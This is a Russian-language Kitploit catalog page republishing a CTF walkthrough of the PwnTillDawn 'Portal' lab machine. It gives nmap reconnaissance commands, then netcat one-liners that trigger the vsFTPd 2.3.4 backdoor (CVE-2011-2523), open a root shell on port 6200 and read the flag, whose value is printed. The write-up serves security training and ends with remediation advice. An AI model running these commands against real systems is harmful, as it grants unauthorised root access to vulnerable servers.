Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
PwnTillDawn-Portal-Walkthrough — Подробное руководство по тестированию на проникновение и отчет об эксплуатации для машины 'Portal', с фокусом на CVE-2011-2523 (бэкдор vsFTPd 2.3.4) для получения root-доступа. | Kitploit
Инструменты/GitHubGitHub/tr00jan99/pwntilldawn-portal-walkthrough
Повышение привилегийРазведкаАнализ уязвимостейЭксплуатацияПост-эксплуатацияCTFТестирование на ПроникновениеОбучение и Образование

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться
GitHub
tr00jan99/pwntilldawn-portal-walkthrough

PwnTillDawn-Portal-Walkthrough

Подробное руководство по тестированию на проникновение и отчет об эксплуатации для машины 'Portal', с фокусом на CVE-2011-2523 (бэкдор vsFTPd 2.3.4) для получения root-доступа.

Репозиторий
5 месяцев назадЕщё не проверено

🔐 Оценка уязвимостей и тестирование на проникновение (VAPT)

📌 Проект: Пошаговое руководство по эксплуатации цели

⚠️ Этот проект предназначен только для образовательных и авторизованных целей тестирования.
Несанкционированный доступ к системам строго запрещен.


👨‍💻 Автор

SYAFIQ
Роль: Ведущий специалист по тестированию на проникновение


🎯 Информация о цели

  • IP-адрес цели: 10.150.150.12
  • Операционная система: Ubuntu Linux
  • Статус: 🔴 КРИТИЧЕСКИЙ (Обнаружен бэкдор)
  • Уязвимость: CVE-2011-2523 (бэкдор vsFTPd)

🧭 Обзор атаки

ФазаИнструментОписание
ОбнаружениеNmapСканирование сети на предмет активных узлов
ПереборNmapОпределение служб и их версий
АнализNSE ScriptОбнаружение известной уязвимости
ЭксплуатацияNetcatАктивация бэкдора
Пост-эксплуатацияTerminalПолучение root-доступа и извлечение флага

🚀 Пошаговое руководство

🔍 Шаг 1: Сетевая разведка

Сканирование активных узлов в сети:

root@kitploit:~
nmap -sn --unprivileged 10.150.150.10-30

✅ Результат:

  • Обнаружено 8 узлов
  • Цель идентифицирована: 10.150.150.12

🔎 Шаг 2: Перебор служб

Сканирование открытых портов и служб:

root@kitploit:~
nmap -Pn -F --unprivileged -sV 10.150.150.12

✅ Находки:

  • Порт 21 → FTP (vsftpd)
  • Порт 22 → SSH (OpenSSH 8.2p1)

⚠️ Шаг 3: Сканирование уязвимостей

Проверка на наличие известной уязвимости бэкдора FTP:

root@kitploit:~
nmap -Pn --unprivileged -p21 --script ftp-vsftpd-backdoor 10.150.150.12

🚨 Результат:

  • Цель УЯЗВИМА
  • CVE-2011-2523 подтверждена

💣 Шаг 4: Эксплуатация

Активация бэкдора с помощью вредоносного имени пользователя:

root@kitploit:~
(echo "USER hello:)"; echo "PASS password"; sleep 1) | nc -nv 10.150.150.12 21

⚡ Это открывает скрытую root-оболочку на порту 6200

🔓 Шаг 5: Получение доступа (root-оболочка)

Подключение к бэкдору и выполнение команд:

root@kitploit:~
(echo "id; cat /root/FLAG1.txt"; sleep 1) | nc -nv 10.150.150.12 6200

✅ Результат:

  • Получен root-доступ
  • uid=0(root) подтвержден

🏁 Флаг захвачен:

root@kitploit:~
5ee499eb5d0b8e4269b13483e57adaa0b3815f48

🧠 Ключевые выводы

  • Всегда обновляйте устаревшие службы (vsFTPd был уязвим)
  • Неправильно настроенные службы могут привести к полной компрометации системы
  • Простые сканирования могут выявить критические уязвимости -🛡️ Рекомендации -🔄 Обновите FTP-службу до последней версии -🚫 Отключите ненужные службы -🔐 Используйте брандмауэр для ограничения доступа -📊 Регулярно проводите аудит безопасности -📚 Отказ от ответственности

Этот проект создан строго для:

  • Изучения кибербезопасности
  • Практики этичного взлома
  • Авторизованного тестирования на проникновение

❌ Не используйте эти знания для незаконных действий.

⭐ Заключительная заметка

«Безопасность — это не продукт, а процесс». — Всегда тестируйте, контролируйте и улучшайте.

Скачать инструмент